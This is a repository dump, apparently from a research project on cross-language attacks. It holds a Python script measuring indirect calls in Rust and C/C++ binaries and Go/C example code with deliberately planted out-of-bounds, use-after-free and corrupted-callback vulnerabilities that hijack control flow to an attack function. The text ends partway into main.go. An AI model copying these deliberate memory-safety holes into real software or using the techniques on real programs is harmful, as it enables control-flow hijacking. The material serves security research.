1465 |                     tmp2 = {
1466 |                             "name": both_top_cs["second"]["name"],
1467 |                             "num": both_top_cs["second"]["num"],
1468 |                             }
1469 | 
1470 |                     # Set the new leader
1471 |                     both_top_cs["first"]["name"] = str(name)
1472 |                     both_top_cs["first"]["num"] = float(md[name]["num_call_sites"])
1473 | 
1474 |                     # Move down
1475 |                     both_top_cs["second"] = tmp1
1476 |                     both_top_cs["third"] = tmp2
1477 | 
1478 |                 elif float(md[name]["num_call_sites"]) > float(both_top_cs["second"]["num"]):
1479 |                     # Get tmps
1480 |                     tmp2 = both_top_cs["second"]
1481 |                     tmp2 = {
1482 |                             "name": both_top_cs["second"]["name"],
1483 |                             "num": both_top_cs["second"]["num"],
1484 |                             }
1485 | 
1486 |                     # Set the new leader
1487 |                     both_top_cs["second"]["name"] = str(name)
1488 |                     both_top_cs["second"]["num"] = float(md[name]["num_call_sites"])
1489 | 
1490 |                     # Move down
1491 |                     both_top_cs["third"] = tmp2
1492 | 
1493 |                 elif float(md[name]["num_call_sites"]) > float(both_top_cs["third"]["num"]):
1494 |                     # Set the new leader
1495 |                     both_top_cs["third"]["name"] = str(name)
1496 |                     both_top_cs["third"]["num"] = float(md[name]["num_call_sites"])
1497 | 
1498 |                 ## Check top invocations 
1499 |                 if float(md[name]["num_invocations"]) > float(both_top_invos["first"]["num"]):
1500 |                     # Get tmps
1501 |                     tmp1 = {
1502 |                             "name": both_top_invos["first"]["name"],
1503 |                             "num": both_top_invos["first"]["num"],
1504 |                             }
1505 |                     tmp2 = {
1506 |                             "name": both_top_invos["second"]["name"],
1507 |                             "num": both_top_invos["second"]["num"],
1508 |                             }
1509 | 
1510 |                     # Set the new leader
1511 |                     both_top_invos["first"]["name"] = str(name)
1512 |                     both_top_invos["first"]["num"] = float(md[name]["num_invocations"])
1513 | 
1514 |                     # Move down
1515 |                     both_top_invos["second"] = tmp1
1516 |                     both_top_invos["third"] = tmp2
1517 | 
1518 |                 elif float(md[name]["num_invocations"]) > float(both_top_invos["second"]["num"]):
1519 |                     # Get tmps
1520 |                     tmp2 = {
1521 |                             "name": both_top_invos["second"]["name"],
1522 |                             "num": both_top_invos["second"]["num"],
1523 |                             }
1524 | 
1525 |                     # Set the new leader
1526 |                     both_top_invos["second"]["name"] = str(name)
1527 |                     both_top_invos["second"]["num"] = float(md[name]["num_invocations"])
1528 | 
1529 |                     # Move down
1530 |                     both_top_invos["third"] = tmp2
1531 | 
1532 |                 elif float(md[name]["num_invocations"]) > float(both_top_invos["third"]["num"]):
1533 |                     # Set the new leader
1534 |                     both_top_invos["third"]["name"] = str(name)
1535 |                     both_top_invos["third"]["num"] = float(md[name]["num_invocations"])
1536 | 
1537 |                 ## Check top Transfer Points
1538 |                 if float(md[name]["num_transfer_points"]) > float(both_top_tps["first"]["num"]):
1539 |                     # Get tmps
1540 |                     tmp1 = {
1541 |                             "name": both_top_tps["first"]["name"],
1542 |                             "num": both_top_tps["first"]["num"],
1543 |                             }
1544 |                     tmp2 = {
1545 |                             "name": both_top_tps["second"]["name"],
1546 |                             "num": both_top_tps["second"]["num"],
1547 |                             }
1548 | 
1549 |                     # Set the new leader
1550 |                     both_top_tps["first"]["name"] = str(name)
1551 |                     both_top_tps["first"]["num"] = float(md[name]["num_transfer_points"])
1552 | 
1553 |                     # Move down
1554 |                     both_top_tps["second"] = tmp1
1555 |                     both_top_tps["third"] = tmp2
1556 | 
1557 |                 elif float(md[name]["num_transfer_points"]) > float(both_top_tps["second"]["num"]):
1558 |                     # Get tmps
1559 |                     tmp2 = {
1560 |                             "name": both_top_tps["second"]["name"],
1561 |                             "num": both_top_tps["second"]["num"],
1562 |                             }
1563 | 
1564 |                     # Set the new leader
1565 |                     both_top_tps["second"]["name"] = str(name)
1566 |                     both_top_tps["second"]["num"] = float(md[name]["num_transfer_points"])
1567 | 
1568 |                     # Move down
1569 |                     both_top_tps["third"] = tmp2
1570 | 
1571 |                 elif float(md[name]["num_transfer_points"]) > float(both_top_tps["third"]["num"]):
1572 |                     # Set the new leader
1573 |                     both_top_tps["third"]["name"] = str(name)
1574 |                     both_top_tps["third"]["num"] = float(md[name]["num_transfer_points"])
1575 | 
1576 |                 ## Check top invocations 
1577 |                 if float(md[name]["num_visitor_points"]) > float(both_top_vps["first"]["num"]):
1578 |                     # Get tmps
1579 |                     tmp1 = {
1580 |                             "name": both_top_vps["first"]["name"],
1581 |                             "num": both_top_vps["first"]["num"],
1582 |                             }
1583 |                     tmp2 = {
1584 |                             "name": both_top_vps["second"]["name"],
1585 |                             "num": both_top_vps["second"]["num"],
1586 |                             }
1587 | 
1588 |                     # Set the new leader
1589 |                     both_top_vps["first"]["name"] = str(name)
1590 |                     both_top_vps["first"]["num"] = float(md[name]["num_visitor_points"])
1591 | 
1592 |                     # Move down
1593 |                     both_top_vps["second"] = tmp1
1594 |                     both_top_vps["third"] = tmp2
1595 | 
1596 |                 elif float(md[name]["num_visitor_points"]) > float(both_top_vps["second"]["num"]):
1597 |                     # Get tmps
1598 |                     tmp2 = both_top_vps["second"]
1599 | 
1600 |                     # Set the new leader
1601 |                     both_top_vps["second"]["name"] = str(name)
1602 |                     both_top_vps["second"]["num"] = float(md[name]["num_visitor_points"])
1603 | 
1604 |                     # Move down
1605 |                     tmp2 = {
1606 |                             "name": both_top_vps["second"]["name"],
1607 |                             "num": both_top_vps["second"]["num"],
1608 |                             }
1609 | 
1610 |                 elif float(md[name]["num_visitor_points"]) > float(both_top_vps["third"]["num"]):
1611 |                     # Set the new leader
1612 |                     both_top_vps["third"]["name"] = str(name)
1613 |                     both_top_vps["third"]["num"] = float(md[name]["num_visitor_points"])
1614 | 
1615 |             except Exception as e:
1616 |                 print(e)
1617 | 
1618 |         ### Print table metrics
1619 |         ## Number of Functions
1620 |         print("Total functions: ")
1621 |         print("Rust: " + str(rust_fns))
1622 |         print("C/C++: " + str(c_fns))
1623 |         print("Both: " + str(both_fns))
1624 | 
1625 |         ## Number of Indirections
1626 |         print("Total Indirect Calls: ")
1627 |         print("Rust: " + str(rust_total_indirs))
1628 |         print("C/C++: " + str(c_total_indirs))
1629 |         print("Both: " + str(both_total_indirs))
1630 | 
1631 |         ## Number of Indirections
1632 |         print("Total Dynamic Calls: ")
1633 |         print("Rust: " + str(rust_total_dynamics))
1634 |         print("C/C++: " + str(c_total_dynamics))
1635 |         print("Both: " + str(both_total_dynamics))
1636 | 
1637 |         ## Number of Call Sites
1638 |         print("Total Call Sites: ")
1639 |         print("Rust: " + str(rust_total_cs))
1640 |         print("C/C++: " + str(c_total_cs))
1641 |         print("Both: " + str(both_total_cs))
1642 | 
1643 |         ## Number of Transfer Points 
1644 |         print("Total Transfer Points: ")
1645 |         print("Rust: " + str(rust_total_tps))
1646 |         print("C/C++: " + str(c_total_tps))
1647 |         print("Both: " + str(both_total_tps))
1648 | 
1649 |         ## Number of Visitor Points 
1650 |         print("Total Visitor Points: ")
1651 |         print("Rust: " + str(rust_total_vps))
1652 |         print("C/C++: " + str(c_total_vps))
1653 |         print("Both: " + str(both_total_vps))
1654 | 
1655 |         ## Number of Invocations 
1656 |         print("Total Invocations: ")
1657 |         print("Rust: " + str(rust_total_invos))
1658 |         print("C/C++: " + str(c_total_invos))
1659 |         print("Both: " + str(both_total_invos))
1660 | 
1661 |         ## Number of Rust closures 
1662 |         print("Total Closures: ")
1663 |         print("Rust: " + str(rust_closures))
1664 | 
1665 |         ## Number of Rust monophorphized functions 
1666 |         print("Total Monomorphized Functions: ")
1667 |         print("Rust: " + str(rust_monos))
1668 | 
1669 |         ### Print Top contenders
1670 |         ## Top Call Sites
1671 |         print("Top Call Sites:")
1672 |         print("Both: " + str(both_top_cs))
1673 |         print("Rust: " + str(rust_top_cs))
1674 |         print("C/C++: " + str(c_top_cs))
1675 | 
1676 |         ## Top Invocations 
1677 |         print("Top Invocations:")
1678 |         print("Both: " + str(both_top_invos))
1679 |         print("Rust: " + str(rust_top_invos))
1680 |         print("C/C++: " + str(c_top_invos))
1681 | 
1682 |         ## Top Transfer Points 
1683 |         print("Top Transfer Points:")
1684 |         print("Both: " + str(both_top_tps))
1685 |         print("Rust: " + str(rust_top_tps))
1686 |         print("C/C++: " + str(c_top_tps))
1687 | 
1688 |         ## Top Visitor Points 
1689 |         print("Top Visitor Points:")
1690 |         print("Both: " + str(both_top_vps))
1691 |         print("Rust: " + str(rust_top_vps))
1692 |         print("C/C++: " + str(c_top_vps))
1693 | 
1694 |         ### Make a CDF for number of indirect calls
1695 |         rust_x = np.sort(np.array(rust_indirs))
1696 |         rust_y = np.arange(1, len(rust_x)+1)/len(rust_x)
1697 | 
1698 |         c_x = np.sort(np.array(c_indirs))
1699 |         c_y = np.arange(1, len(c_x)+1)/len(c_x)
1700 | 
1701 |         both_x = np.sort(np.array(both_indirs))
1702 |         both_y = np.arange(1, len(both_x)+1)/len(both_x)
1703 | 
1704 |         print("Generating CDF for indirect function calls...")
1705 |         print(both_y)
1706 |         cdf_plt = plt.figure()
1707 | 
1708 |         # Graph labels
1709 |         plt.title("Number of Indirect Function Calls")
1710 |         plt.xlabel("Number of Indirect Function Calls")
1711 |         plt.ylabel("Cumulative Distribution Function (CDF)")
1712 | 
1713 |         #plt.axis([0, max(both_x), 0, 1])
1714 |         plt.axis([0, 10, 0.9, 1])
1715 | 
1716 |         # Grayscale
1717 |         #plt.plot(both_x, both_y, label='All', marker='^', color='0.6', linestyle='-', markevery=len(both_x)/10000000)
1718 |         #plt.plot(rust_x, rust_y, label='Rust', marker='o', color='0.35', linestyle='-', markevery=len(rust_x)/200000)
1719 |         #plt.plot(c_x, c_y, label='C/C++', marker='s', color='0', linestyle='-', markevery=len(c_x)/10000000)
1720 | 
1721 |         # Color
1722 |         plt.plot(both_x, both_y, label='All', marker='^', color='0', linestyle='-', markevery=len(both_x)/10000000)
1723 |         plt.plot(rust_x, rust_y, label='Rust', marker='o', color='red', linestyle='-', markevery=len(rust_x)/200000)
1724 |         plt.plot(c_x, c_y, label='C/C++', marker='s', color='blue', linestyle='-', markevery=len(c_x)/10000000)
1725 | 
1726 |         # Generate and save graph
1727 |         #plt.grid(True)
1728 |         plt.grid(True, color='0.45')
1729 |         plt.plot()
1730 |         plt.show()
1731 |         plt.legend(loc='upper center',bbox_to_anchor=(0.5, -0.15),shadow=True, ncol=3)
1732 |         print("Saving indirs...")
1733 |         cdf_plt.savefig("output/graphs/indirs.pdf", bbox_inches='tight')
1734 | 
1735 | 
1736 |         ### Make a CDF for number of dynamic calls
1737 |         rust_x = np.sort(np.array(rust_dynamics))
1738 |         rust_y = np.arange(1, len(rust_x)+1)/len(rust_x)
1739 | 
1740 |         c_x = np.sort(np.array(c_dynamics))
1741 |         c_y = np.arange(1, len(c_x)+1)/len(c_x)
1742 | 
1743 |         both_x = np.sort(np.array(both_dynamics))
1744 |         both_y = np.arange(1, len(both_x)+1)/len(both_x)
1745 | 
1746 |         print("Generating CDF for dynamic function calls...")
1747 |         cdf_plt = plt.figure()
1748 | 
1749 |         # Graph labels
1750 |         plt.title("Number of Dynamic Function Calls")
1751 |         plt.xlabel("Number of Dynamic Function Calls")
1752 |         plt.ylabel("Cumulative Distribution Function (CDF)")
1753 | 
1754 |         #plt.axis([0, max(both_x), 0.9, 1])
1755 |         plt.axis([0, 20, 0.85, 1])
1756 | 
1757 |         #plt.plot(both_x, both_y, label='All', marker='^', color='0.6', linestyle='-', markevery=len(both_x)/5000000)
1758 |         #plt.plot(rust_x, rust_y, label='Rust', marker='o', color='0.35', linestyle='-', markevery=len(rust_x)/200000)
1759 |         #plt.plot(c_x, c_y, label='C/C++', marker='s', color='0', linestyle='-', markevery=len(c_x)/5000000)
1760 | 
1761 |         plt.plot(both_x, both_y, label='All', marker='^', color='0', linestyle='-', markevery=len(both_x)/5000000)
1762 |         plt.plot(rust_x, rust_y, label='Rust', marker='o', color='red', linestyle='-', markevery=len(rust_x)/200000)
1763 |         plt.plot(c_x, c_y, label='C/C++', marker='s', color='blue', linestyle='-', markevery=len(c_x)/5000000)
1764 | 
1765 |         # Generate and save graph
1766 |         #plt.grid(True)
1767 |         plt.grid(True, color='0.45')
1768 |         plt.plot()
1769 |         plt.legend(loc='upper center',bbox_to_anchor=(0.5, -0.15),shadow=True, ncol=3)
1770 |         print("Saving dynamics...")
1771 |         cdf_plt.savefig("output/graphs/dynamics.pdf", bbox_inches='tight')
1772 | 
1773 |         ### Make a CDF for number of call sites
1774 |         rust_x = np.sort(np.array(rust_cs))
1775 |         rust_y = np.arange(1, len(rust_x)+1)/len(rust_x)
1776 | 
1777 |         c_x = np.sort(np.array(c_cs))
1778 |         c_y = np.arange(1, len(c_x)+1)/len(c_x)
1779 | 
1780 |         both_x = np.sort(np.array(both_cs))
1781 |         both_y = np.arange(1, len(both_x)+1)/len(both_x)
1782 | 
1783 |         print("Generating CDF for number of call sites...")
1784 |         cdf_plt = plt.figure()
1785 | 
1786 |         # Graph labels
1787 |         plt.title("Number of Call Sites")
1788 |         plt.xlabel("Number of Call Sites")
1789 |         plt.ylabel("Cumulative Distribution Function (CDF)")
1790 | 
1791 |         #plt.axis([0, max(both_x), 0.9, 1])
1792 |         plt.axis([0, 50, 0.8, 1])
1793 | 
1794 |         #plt.plot(both_x, both_y, label='All', marker='^', color='0.6', linestyle='-', markevery=len(both_x)/10000000)
1795 |         #plt.plot(rust_x, rust_y, label='Rust', marker='o', color='0.35', linestyle='-', markevery=len(rust_x)/200000)
1796 |         #plt.plot(c_x, c_y, label='C/C++', marker='s', color='0', linestyle='-', markevery=len(c_x)/10000000)
1797 | 
1798 |         plt.plot(both_x, both_y, label='All', marker='^', color='0', linestyle='-', markevery=len(both_x)/10000000)
1799 |         plt.plot(rust_x, rust_y, label='Rust', marker='o', color='red', linestyle='-', markevery=len(rust_x)/200000)
1800 |         plt.plot(c_x, c_y, label='C/C++', marker='s', color='blue', linestyle='-', markevery=len(c_x)/10000000)
1801 | 
1802 |         # Generate and save graph
1803 |         #plt.grid(True)
1804 |         plt.grid(True, color='0.45')
1805 |         plt.plot()
1806 |         plt.legend(loc='upper center',bbox_to_anchor=(0.5, -0.15),shadow=True, ncol=3)
1807 |         print("Saving calls...")
1808 |         cdf_plt.savefig("output/graphs/calls.pdf", bbox_inches='tight')
1809 | 
1810 |         ### Make a CDF for number of transfer points
1811 |         rust_x = np.sort(np.array(rust_tps))
1812 |         rust_y = np.arange(1, len(rust_x)+1)/len(rust_x)
1813 | 
1814 |         c_x = np.sort(np.array(c_tps))
1815 |         c_y = np.arange(1, len(c_x)+1)/len(c_x)
1816 | 
1817 |         both_x = np.sort(np.array(both_tps))
1818 |         both_y = np.arange(1, len(both_x)+1)/len(both_x)
1819 | 
1820 |         print("Generating CDF for number of transfer points...")
1821 |         cdf_plt = plt.figure()
1822 | 
1823 |         # Graph labels
1824 |         plt.title("Number of Transfer Points")
1825 |         plt.xlabel("Number of Transfer Points")
1826 |         plt.ylabel("Cumulative Distribution Function (CDF)")
1827 | 
1828 |         #plt.axis([0, max(both_x), 0.9, 1])
1829 |         plt.axis([0, 20, 0.9, 1])
1830 | 
1831 |         #plt.plot(both_x, both_y, label='All', marker='^', color='0.6', linestyle='-', markevery=len(both_x)/5000000)
1832 |         #plt.plot(rust_x, rust_y, label='Rust', marker='o', color='0.35', linestyle='-', markevery=len(rust_x)/200000)
1833 |         #plt.plot(c_x, c_y, label='C/C++', marker='s', color='0', linestyle='-', markevery=len(c_x)/5000000)
1834 | 
1835 |         plt.plot(both_x, both_y, label='All', marker='^', color='0', linestyle='-', markevery=len(both_x)/5000000)
1836 |         plt.plot(rust_x, rust_y, label='Rust', marker='o', color='red', linestyle='-', markevery=len(rust_x)/200000)
1837 |         plt.plot(c_x, c_y, label='C/C++', marker='s', color='blue', linestyle='-', markevery=len(c_x)/5000000)
1838 | 
1839 |         # Generate and save graph
1840 |         #plt.grid(True)
1841 |         plt.grid(True, color='0.45')
1842 |         plt.plot()
1843 |         plt.legend(loc='upper center',bbox_to_anchor=(0.5, -0.15),shadow=True, ncol=3)
1844 |         print("Saving tps...")
1845 |         cdf_plt.savefig("output/graphs/tps.pdf", bbox_inches='tight')
1846 | 
1847 |         ### Make a CDF for number of visitor points
1848 |         #print("rust_vps")
1849 |         #print(rust_vps)
1850 |         #print("c_vps")
1851 |         #print(c_vps)
1852 |         #print("both_vps")
1853 |         #print(both_vps)
1854 |         rust_x = np.sort(np.array(rust_vps))
1855 |         rust_y = np.arange(1, len(rust_x)+1)/len(rust_x)
1856 | 
1857 |         c_x = np.sort(np.array(c_vps))
1858 |         c_y = np.arange(1, len(c_x)+1)/len(c_x)
1859 | 
1860 |         both_x = np.sort(np.array(both_vps))
1861 |         both_y = np.arange(1, len(both_x)+1)/len(both_x)
1862 | 
1863 |         print("Generating CDF for number of visitor points...")
1864 |         cdf_plt = plt.figure()
1865 | 
1866 |         # Graph labels
1867 |         plt.title("Number of Visitor Points")
1868 |         plt.xlabel("Number of Visitor Points")
1869 |         plt.ylabel("Cumulative Distribution Function (CDF)")
1870 | 
1871 |         #plt.axis([0, max(both_x), 0.9, 1])
1872 |         plt.axis([0, 10, 0.9, 1])
1873 | 
1874 |         #plt.plot(both_x, both_y, label='All', marker='^', color='0.6', linestyle='-', markevery=len(both_x)/500000)
1875 |         #plt.plot(rust_x, rust_y, label='Rust', marker='o', color='0.35', linestyle='-', markevery=len(rust_x)/200000)
1876 |         #plt.plot(c_x, c_y, label='C/C++', marker='s', color='0', linestyle='-', markevery=len(c_x)/500000)
1877 | 
1878 |         plt.plot(both_x, both_y, label='All', marker='^', color='0', linestyle='-', markevery=len(both_x)/250000)
1879 |         plt.plot(rust_x, rust_y, label='Rust', marker='o', color='red', linestyle='-', markevery=len(rust_x)/200000)
1880 |         plt.plot(c_x, c_y, label='C/C++', marker='s', color='blue', linestyle='-', markevery=len(c_x)/250000)
1881 | 
1882 |         # Generate and save graph
1883 |         #plt.grid(True)
1884 |         plt.grid(True, color='0.45')
1885 |         plt.plot()
1886 |         plt.legend(loc='upper center',bbox_to_anchor=(0.5, -0.15),shadow=True, ncol=3)
1887 |         print("Saving vps...")
1888 |         cdf_plt.savefig("output/graphs/vps.pdf", bbox_inches='tight')
1889 | 
1890 |         ### Make a CDF for number of invocations 
1891 |         #print("rust_invos")
1892 |         #print(rust_invos)
1893 | 
1894 |         rust_x = np.sort(np.array(rust_invos))
1895 |         rust_y = np.arange(1, len(rust_x)+1)/len(rust_x)
1896 | 
1897 |         #print("c_invos")
1898 |         #print(c_invos)
1899 | 
1900 |         c_x = np.sort(np.array(c_invos))
1901 |         c_y = np.arange(1, len(c_x)+1)/len(c_x)
1902 | 
1903 |         #print("both_invos")
1904 |         #print(both_invos)
1905 | 
1906 |         both_x = np.sort(np.array(both_invos))
1907 |         both_y = np.arange(1, len(both_x)+1)/len(both_x)
1908 | 
1909 |         print("Generating CDF for number of invocations...")
1910 |         cdf_plt = plt.figure()
1911 | 
1912 |         # Graph labels
1913 |         plt.title("Number of Invocations")
1914 |         plt.xlabel("Number of Invocations")
1915 |         plt.ylabel("Cumulative Distribution Function (CDF)")
1916 | 
1917 |         #plt.axis([0, max(both_x), 0.9, 1])
1918 |         plt.axis([0, 30, 0.8, 1])
1919 | 
1920 |         #plt.plot(both_x, both_y, label='All', marker='^', color='0.6', linestyle='-', markevery=len(both_x)/1000000)
1921 |         #plt.plot(rust_x, rust_y, label='Rust', marker='o', color='0.35', linestyle='-', markevery=len(rust_x)/200000)
1922 |         #plt.plot(c_x, c_y, label='C/C++', marker='s', color='0', linestyle='-', markevery=len(c_x)/1000000)
1923 | 
1924 |         plt.plot(both_x, both_y, label='All', marker='^', color='0', linestyle='-', markevery=len(both_x)/750000)
1925 |         plt.plot(rust_x, rust_y, label='Rust', marker='o', color='red', linestyle='-', markevery=len(rust_x)/200000)
1926 |         plt.plot(c_x, c_y, label='C/C++', marker='s', color='blue', linestyle='-', markevery=len(c_x)/750000)
1927 | 
1928 |         # Generate and save graph
1929 |         #plt.grid(True)
1930 |         plt.grid(True, color='0.45')
1931 |         plt.plot()
1932 |         plt.legend(loc='upper center',bbox_to_anchor=(0.5, -0.15),shadow=True, ncol=3)
1933 |         print("Saving invos...")
1934 |         cdf_plt.savefig("output/graphs/invos.pdf", bbox_inches='tight')
1935 | 
1936 | if __name__ == "__main__":
1937 | 
1938 |     # Version that takes a file of binaries
1939 |     parser = ArgumentParser()
1940 |     parser.add_argument("bin_paths", type=str, help="""
1941 |     Path of file that contains list of binaries to generate metrics for 
1942 |     """)
1943 |     args = parser.parse_args()
1944 | 
1945 |     # Find each relevant binary
1946 |     # TODO: call find_elf.sh from python
1947 | 
1948 |     # For each elf, create a json file of function metadata 
1949 |     elf_reader(args.bin_paths)
1950 | 
1951 |     # Combine each elf json file into a single json file of function metadata 
1952 |     combine_elf_results(args.bin_paths)
1953 | 
1954 |     # For each objdump, create a json file of function metadata 
1955 |     obj_reader(args.bin_paths)
1956 | 
1957 |     # Combine each obj json file into a single json file of function metadata 
1958 |     combine_obj_results(args.bin_paths)
1959 | 
1960 |     # Combine elf and obj json metadata into one json file of function metadata
1961 |     combine_elf_and_obj_results()
1962 | 
1963 |     # Use call sites in function metadata to find transfer and visitor points and save 
1964 |     get_transfer_points()
1965 | 
1966 |     # Use call sites in function metadata to find invocations  
1967 |     get_invocation_points()
1968 | 
1969 |     # Make graphs from metadata
1970 |     generate_cdfs()
1971 | 


--------------------------------------------------------------------------------
/cla-metrics/input/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-metrics/input/.DS_Store


--------------------------------------------------------------------------------
/cla-metrics/input/elfs/.placeholder:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-metrics/input/elfs/.placeholder


--------------------------------------------------------------------------------
/cla-metrics/input/objdumps/.placeholder:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-metrics/input/objdumps/.placeholder


--------------------------------------------------------------------------------
/cla-metrics/input/source-info.json:
--------------------------------------------------------------------------------
1 | {
2 |     "rust": [],
3 |     "c": []
4 | }
5 | 


--------------------------------------------------------------------------------
/cla-metrics/output/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-metrics/output/.DS_Store


--------------------------------------------------------------------------------
/cla-metrics/output/elf-results/.placeholder:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-metrics/output/elf-results/.placeholder


--------------------------------------------------------------------------------
/cla-metrics/output/graphs/.placeholder:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-metrics/output/graphs/.placeholder


--------------------------------------------------------------------------------
/cla-metrics/output/obj-results/.placeholder:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-metrics/output/obj-results/.placeholder


--------------------------------------------------------------------------------
/go-cla-examples/Makefile:
--------------------------------------------------------------------------------
 1 | DIR=$(dir $(realpath $(firstword $(MAKEFILE_LIST))))
 2 | 
 3 | all: go
 4 | 
 5 | dynamic-c:
 6 | 	#clang -fPIC -c -o $(DIR)/src/init/init.o $(DIR)src/init/init.c -fsanitize=cfi -flto -fvisibility=hidden 
 7 | 	#clang -fPIC -shared -o $(DIR)src/init/libinit.so $(DIR)src/init/init.o -fsanitize=cfi -flto -fvisibility=hidden
 8 | 	clang -fPIC -c -o $(DIR)/src/init/init.o $(DIR)src/init/init.c 
 9 | 	clang -fPIC -shared -o $(DIR)src/init/libinit.so $(DIR)src/init/init.o 
10 | 
11 | static-c:
12 | 	clang -fPIC -c -o $(DIR)/src/init/init.o $(DIR)src/init/init.c -fsanitize=cfi -flto -fvisibility=hidden 
13 | 	ar crs $(DIR)src/init/libinit.a $(DIR)/src/init/init.o 
14 | 
15 | go: dynamic-c 
16 | 	gofmt -e -s -w .
17 | 	CGO_CFLAGS="-flto -ffat-lto-objects" go build $(DIR)/src/main.go
18 | 
19 | sim: 
20 | 	LD_LIBRARY_PATH=$(DIR)/src/init/ $(DIR)/main 
21 | 
22 | obj: go 
23 | 	objdump -S $(DIR)/main > $(DIR)/main.obj
24 | 	
25 | clean:
26 | 	rm -rf $(DIR)/main
27 | 	rm -f $(DIR)/src/init/libinit.a
28 | 	rm -f $(DIR)/src/init/libinit.so
29 | 	rm -f $(DIR)/src/init/init.o
30 | 	rm -f $(DIR)/main.obj
31 | 


--------------------------------------------------------------------------------
/go-cla-examples/src/init/init.c:
--------------------------------------------------------------------------------
  1 | #include <stdint.h>
  2 | #include <stdio.h>
  3 | #include <stdlib.h>
  4 | #include <malloc.h>
  5 | 
  6 | // Simple function that acts user input
  7 | extern int64_t get_attack();
  8 | 
  9 | // Simple initialization function
 10 | void init() {
 11 |     // Turns off heap checks for double frees 
 12 |     // Set to lowest level which just prints out the error and continues
 13 |     // Not strictly necessary, but helps with presentation
 14 |     // I.e., prints when we achieved a double free
 15 |     mallopt(M_CHECK_ACTION, 1);
 16 | }
 17 | 
 18 | // Given the array to modify, this function set a field in the array  
 19 | // Can cause an OOB vulnerability
 20 | void user_given_array(int64_t array_ptr_addr) {
 21 |     // These values could be set by a corruptible source, e.g., user input
 22 |     // Thus, the index points to Data.cb and value is the address of attack() 
 23 |     // This is an OOB as it indexes past the allocated array of size 3)
 24 |     int64_t array_index = 3;
 25 |     int64_t array_value = get_attack(); 
 26 | 
 27 |     int64_t* a = (void *)array_ptr_addr;
 28 |     printf("addr of a[array_index] in user_given_array: %ld\n", (int64_t)&(a[array_index]));
 29 | 
 30 |     a[array_index] = array_value;
 31 |     printf("Done with user_given_array.\n");
 32 | }
 33 | 
 34 | // This function prints the address of a given array 
 35 | // Can cause UaF and DF vulnerabilities
 36 | void print_array_addr(int64_t array_ptr_addr) {
 37 |     int64_t* a = (void *)array_ptr_addr;
 38 |     printf("addr of a in print_array_addr: %ld\n", (int64_t)a);
 39 | 
 40 |     // This is an unnecessary free call, as Go allocated the array 
 41 |     // (and subsequently Go will free this array later) 
 42 |     //free(a);
 43 | 
 44 |     // C now thinks it can use a for something else 
 45 |     // (e.g., set it to a user defined address)
 46 |     // Go may not realize this functionality occurs
 47 |     // These values could be set by a corruptible source, e.g., user input
 48 |     int64_t array_value = get_attack(); 
 49 |     *a = array_value;
 50 | 
 51 |     printf("Done with print_array_addr.\n");
 52 | }
 53 | 
 54 | 
 55 | // This function allocates its own array and populates based on user input
 56 | void user_set_array() {
 57 | 
 58 |     // Initialize array
 59 |     int64_t a[1] = { 0 };
 60 | 
 61 |     // These values could be set by a corruptible source, e.g., user input
 62 |     // Thus, the index points to Data.cb and value is the address of attack() 
 63 |     // This is an OOB as it indexes past the allocated array of size 3)
 64 |     // Note: the value of array_index only works 50% of the time
 65 |     // It depends on what memory address the stack gets 
 66 |     // (i.e., stack location is not deterministic in Go) 
 67 |     // Thus, we corrupt two likely canidates  
 68 | 
 69 |     int64_t array_index = (((int64_t)get_attack() + 824628677912) - (int64_t)&a)/8; 
 70 |     int64_t array_index2 = (((int64_t)get_attack() + 824628698392) - (int64_t)&a)/8; 
 71 | 
 72 |     int64_t array_value = get_attack(); 
 73 | 
 74 |     printf("addr of &a: %ld\n", (int64_t)&a);
 75 |     printf("array_value: %ld\n", array_value);
 76 |     printf("addr of a[array_index] in user_given_array: %ld\n", (int64_t)&(a[array_index]));
 77 |     printf("addr of a[array_index2] in user_given_array: %ld\n", (int64_t)&(a[array_index2]));
 78 | 
 79 |     a[array_index] = array_value;
 80 |     a[array_index2] = array_value;
 81 |     printf("Done with user_set_array.\n");
 82 | }
 83 | 
 84 | // Go calls this function to get the right address of a call back function
 85 | // If Go doesn't properly sanitize data from this function, 
 86 | // it could return corrupted data
 87 | int64_t get_cb_from_c() {
 88 |     // These values could be set by a corruptible source, e.g., user input
 89 |     int64_t call_back_addr = get_attack(); 
 90 | 
 91 |     return call_back_addr;
 92 | }
 93 | 
 94 | // Given the array to modify, this function set a field in the array  
 95 | // Can cause an OOB vulnerability
 96 | void user_given_slice(int64_t slice_ptr_addr) {
 97 |     // These values could be set by a corruptible source, e.g., user input
 98 |     // Thus, the index points to the slice fat pointer and value too large 
 99 |     // This is an OOB as it indexes past the allocated array of size 3)
100 |     int64_t array_index = 1;
101 |     int64_t array_value = 10000000; 
102 | 
103 |     int64_t* a = (void *)slice_ptr_addr;
104 |     printf("addr of a[array_index] in user_given_slice: %ld\n", (int64_t)&(a[array_index]));
105 | 
106 |     a[array_index] = array_value;
107 |     printf("Done with user_given_slice.\n");
108 | }
109 | 


--------------------------------------------------------------------------------
/go-cla-examples/src/init/init.h:
--------------------------------------------------------------------------------
1 | #include <stdint.h>
2 | 
3 | void init();
4 | void user_given_array(int64_t array_ptr_addr);
5 | void print_array_addr(int64_t array_ptr_addr);
6 | void user_set_array();
7 | void user_given_slice(int64_t slice_ptr_addr);
8 | int64_t get_cb_from_c();
9 | 


--------------------------------------------------------------------------------
/go-cla-examples/src/main.go:
--------------------------------------------------------------------------------
  1 | package main
  2 | 
  3 | /*
  4 | #include "./init/init.h"
  5 | #include <stdint.h>       // for C.int64_t
  6 | #include <stdlib.h>       // for free()
  7 | #cgo LDFLAGS: -L./init/ -linit
  8 | */
  9 | import "C"
 10 | 
 11 | import (
